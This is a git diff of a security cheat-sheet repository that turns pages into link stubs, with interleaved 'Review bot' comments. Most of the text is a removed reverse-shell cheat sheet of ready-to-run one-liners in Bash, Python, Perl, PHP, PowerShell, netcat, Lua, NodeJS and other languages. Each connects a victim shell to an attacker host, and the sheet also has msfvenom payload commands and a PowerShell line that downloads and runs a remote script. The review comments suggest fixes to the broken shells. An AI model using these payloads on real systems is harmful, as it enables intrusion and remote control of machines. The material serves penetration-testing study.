* [OfficePurge](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#officepurge)
* [EvilClippy](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#evilclippy)
* [VBA AMSI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-amsi)
* [VBA - Offensive Security Template](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba---offensive-security-template)
* [DOCX - Template Injection](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docx---template-injection)
* [DOCX - DDE](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docx---dde)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#references)
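Review bot: the label of `* [DCOM - WMI COM functions (VBA AMSI)](...#docm---wmi-com-functions)` disagrees with its anchor: the slug is `docm---wmi-com-functions`, so "DCOM" looks like a transposition of "DOCM", and the "(VBA AMSI)" suffix is not part of the target heading (a separate `VBA AMSI` entry exists further down). Likewise `* [DOCM - Macro Pack - Macro and DDE]` points at `#docmxlm---macro-pack---macro-and-dde`, i.e. a heading named "DOCM/XLM - Macro Pack - Macro and DDE". Suggest making each label match its target heading, since once the body is gone this index is all that remains on the page.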

View File

@@ -0,0 +1,17 @@
# Powershell
:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/)
- [Execution Policy](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#execution-policy)
- [Encoded Commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands)
- [Constrained Mode](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#constrained-mode)
- [Encoded Commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands)
- [Download file](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#download-file)
- [Load Powershell scripts](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-powershell-scripts)
- [Load Chttps://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/# assembly reflectively](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-c-assembly-reflectively)
- [Call Win API using delegate functions with Reflection](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#call-win-api-using-delegate-functions-with-reflection)
- [Resolve address functions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#resolve-address-functions)
- [DelegateType Reflection](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#delegatetype-reflection)
- [Example with a simple shellcode runner](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#example-with-a-simple-shellcode-runner)
- [Secure String to Plaintext](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#secure-string-to-plaintext)
- [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#references)
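Review bot: `Encoded Commands` appears twice in this index (the fourth and sixth entries) pointing at the same `#encoded-commands` anchor; drop one. The entry `- [Load Chttps://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/# assembly reflectively](...#load-c-assembly-reflectively)` has been mangled by a link rewrite that treated the `#` in `C#` as an anchor; it should read `- [Load C# assembly reflectively](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-c-assembly-reflectively)`. Minor: the banner says the page moved to `cheatsheets/powershell` while the URL path is `cheatsheets/powershell-cheatsheet/`; the label should match the path.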

View File

@@ -1,347 +1,43 @@
# Reverse Shell Cheat Sheet # Reverse Shell Cheat Sheet
## Summary :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheet/shell-reverse](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/)
* [Reverse Shell](#reverse-shell) * [Tools](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#tools)
* [Bash TCP](#bash-tcp) * [Reverse Shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#reverse-shell)
* [Bash UDP](#bash-udp) * [Awk](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#awk)
* [Socat](#socat) * [Automatic Reverse Shell Generator](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#revshells)
* [Perl](#perl) * [Bash TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-tcp)
* [Python](#python) * [Bash UDP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-udp)
* [PHP](#php) * [C](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#c)
* [Ruby](#ruby) * [Dart](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#dart)
* [Golang](#golang) * [Golang](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#golang)
* [Netcat Traditional](#netcat-traditional) * [Groovy Alternative 1](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#groovy-alternative-1)
* [Netcat OpenBsd](#netcat-openbsd) * [Groovy](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#groovy)
* [Ncat](#ncat) * [Java Alternative 1](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java-alternative-1)
* [OpenSSL](#openssl) * [Java Alternative 2](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java-alternative-2)
* [Powershell](#powershell) * [Java](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#java)
* [Awk](#awk) * [Lua](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#lua)
* [Java](#java) * [Ncat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ncat)
* [War](#war) * [Netcat OpenBsd](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-openbsd)
* [Lua](#lua) * [Netcat BusyBox](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-busybox)
* [NodeJS](#nodejs) * [Netcat Traditional](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#netcat-traditional)
* [Groovy](#groovy) * [NodeJS](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#nodejs)
* [Meterpreter Shell](#meterpreter-shell) * [OGNL](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ognl)
* [Windows Staged reverse TCP](#windows-staged-reverse-tcp) * [OpenSSL](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#openssl)
* [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) * [Perl](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#perl)
* [Linux Staged reverse TCP](#linux-staged-reverse-tcp) * [PHP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#php)
* [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp) * [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell)
* [Other platforms](#other-platforms) * [Python](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#python)
* [Spawn TTY Shell](#spawn-tty-shell) * [Ruby](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#ruby)
* [References](#references) * [Rust](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#rust)
* [Socat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#socat)
## Reverse Shell * [Telnet](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#telnet)
* [War](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#war)
### Bash TCP * [Meterpreter Shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#meterpreter-shell)
* [Windows Staged reverse TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#windows-staged-reverse-tcp)
```bash * [Windows Stageless reverse TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#windows-stageless-reverse-tcp)
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 * [Linux Staged reverse TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#linux-staged-reverse-tcp)
* [Linux Stageless reverse TCP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#linux-stageless-reverse-tcp)
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196 * [Other platforms](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#other-platforms)
``` * [Spawn TTY Shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#spawn-tty-shell)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#references)
### Bash UDP
```bash
Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
Listener:
nc -u -lvp 4242
```
### Socat
```powershell
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4242
```
Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
### Perl
```perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
### Python
Linux only
IPv4
```python
export RHOST="10.10.10.10";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
IPv4
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```
IPv6
```python
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
```
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Windows only
```powershell
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.10.10', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
### PHP
```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```
### Ruby
```ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
### Golang
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```
### Netcat Traditional
```bash
nc -e /bin/sh [IPADDR] [PORT]
nc.traditional -e /bin/bash 10.0.0.1 4444
```
### Netcat OpenBsd
```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
```
### Ncat
```bash
ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash
```
### OpenSSL
```powershell
hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
or
hacker@kali$ ncat --ssl -vv -l -p 4242
user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
```
### Powershell
```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
```powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
```
### Awk
```powershell
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
### Java
```java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
### War
```java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
```
### Lua
Linux only
```powershell
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
```
Windows and Linux
```powershell
lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
### NodeJS
```javascript
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4242, "10.0.0.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
or
require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
### Groovy
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
NOTE: Java reverse shell also work for Groovy
```javascript
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
## Meterpreter Shell
### Windows Staged reverse TCP
```powershell
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe
```
### Windows Stageless reverse TCP
```powershell
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe
```
### Linux Staged reverse TCP
```powershell
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf
```
### Linux Stageless reverse TCP
```powershell
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf
```
### Other platforms
```powershell
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
```
## Spawn TTY Shell
In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`.
```powershell
rlwrap nc localhost 80
```
Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell.
:warning: OhMyZSH might break this trick, a simple `sh` is recommended
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
```powershell
ctrl+z
echo $TERM && tput lines && tput cols
# for bash
stty raw -echo
fg
# for zsh
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```
or use `socat` binary to get a fully tty reverse shell
```bash
socat file:`tty`,raw,echo=0 tcp-listen:12345
```
Spawn a TTY shell from an interpreter
```powershell
/bin/sh -i
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
```
## References
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
* [Spawning a TTY Shell](http://netsec.ws/?p=337)
* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)
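Review bot: the banner label `InternalAllTheThings/cheatsheet/shell-reverse` does not match the URL path `cheatsheets/shell-reverse-cheatsheet/` (singular vs plural, and the `-cheatsheet` suffix); use the real path. `* [Automatic Reverse Shell Generator]` targets `#revshells`, which only resolves if the destination heading is literally "revshells"; worth verifying. On the removed side, a few lines were wrong and should be corrected in the new page rather than carried over: the first PowerShell one-liner runs `New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242)` without assigning it, so the following `$stream = $client.GetStream()` dereferences an unset `$client` (the second variant, with `$client = New-Object ...`, is the working form); the NodeJS block has `-var x = global.process.mainModule.require` and `-x('child_process').exec(...)` with stray leading `-` characters that are not JavaScript, and its comment reads "form crashing" for "from crashing".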

View File

@@ -0,0 +1,9 @@
# Source Code Management & CI/CD Compromise
:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/source-code-management-ci](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/)
* [Tools](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#tools)
* [Enumerate repositories files and secrets](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#enumerate-repositories-files-and-secrets)
* [Personal Access Token](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#personal-access-token)
* [Gitlab CI/Github Actions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#gitlab-cigithub-actions)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#references)

View File

@@ -1,6 +1,6 @@
# Subdomains Enumeration # Subdomains Enumeration
## Summary :warning: Content of this page has been moved to [InternalAllTheThings/cloud/azure](https://github.com/swisskyrepo/InternalAllTheThings/)
* [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext) * [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext)
* Subbrute * Subbrute
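Review bot: the moved-page notice added in this hunk points at the wrong place: the link text reads `InternalAllTheThings/cloud/azure` for a subdomain enumeration page, and the URL is the repository root rather than the page itself. Every other notice in this changeset links the specific page under `https://swisskyrepo.github.io/InternalAllTheThings/...`; use the matching page path and text here. Note also that the old content is kept below the notice, whereas the other moved pages are reduced to a link stub; pick one convention.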
@@ -9,10 +9,12 @@
* EyeWitness * EyeWitness
* Sublist3r * Sublist3r
* Subfinder * Subfinder
* Findomain
* Aquatone (Ruby and Go versions) * Aquatone (Ruby and Go versions)
* AltDNS * AltDNS
* MassDNS * MassDNS
* Nmap * Nmap
* Dnsdumpster
* Subdomain take over * Subdomain take over
* tko-subs * tko-subs
* HostileSubBruteForcer * HostileSubBruteForcer
@@ -86,6 +88,17 @@ go get github.com/subfinder/subfinder
./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt
``` ```
### Using Findomain
```powershell
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ findomain_spyse_token="YourAccessToken"
$ findomain_virustotal_token="YourAccessToken"
$ findomain_fb_token="YourAccessToken"
$ ./findomain-linux -t example.com -o
```
### Using Aquatone - old version (Ruby) ### Using Aquatone - old version (Ruby)
```powershell ```powershell
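Review bot: the three token assignments in the new Findomain block (`findomain_spyse_token=...`, `findomain_virustotal_token=...`, `findomain_fb_token=...`) are plain shell variables, not exports, so the `./findomain-linux` process started on the next line will not see them; prefix each with `export`, or set them inline on the command line. The block is also fenced as `powershell` although it is a Linux shell session (`wget`, `chmod +x`); `bash` is the accurate tag.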
@@ -151,6 +164,13 @@ cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/res
nmap -sn --script hostmap-crtsh host_to_scan.tld nmap -sn --script hostmap-crtsh host_to_scan.tld
``` ```
### Using dnsdumpster
```ps1
git clone https://github.com/nmmapper/dnsdumpster
python dnsdumpster.py -d domainname.com
```
## Subdomain take over ## Subdomain take over
Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records. Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
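Review bot: the dnsdumpster block clones the repository and then runs `python dnsdumpster.py` from the current directory, where that file does not exist; add `cd dnsdumpster` between the two commands. The fence tag `ps1` also differs from the `powershell` and `bash` tags used everywhere else in this file.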
@@ -166,7 +186,7 @@ go get github.com/anshumanbh/tko-subs
```bash ```bash
git clone https://github.com/nahamsec/HostileSubBruteforcer git clone https://github.com/nahamsec/HostileSubBruteforcer
chmox +x sub_brute.rb chmod +x sub_brute.rb
./sub_brute.rb ./sub_brute.rb
``` ```
@@ -180,4 +200,4 @@ go get github.com/Ice3man543/SubOver
## References ## References
* [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/) * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
* [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/) * [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)

View File

@@ -0,0 +1,9 @@
# Vulnerability Reports
:warning: Content of this page has been moved to [InternalAllTheThings/methodology/vulnerability-reports](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/)
* [Tools](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#tools)
* [Vulnerability Report Structure](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-report-structure)
* [Vulnerability Details Structure](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-details-structure)
* [General Guidelines](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#general-guidelines)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#references)

View File

@@ -0,0 +1,21 @@
# Windows - AMSI Bypass
:warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-amsi-bypass](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/)
* [List AMSI Providers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#list-amsi-providers)
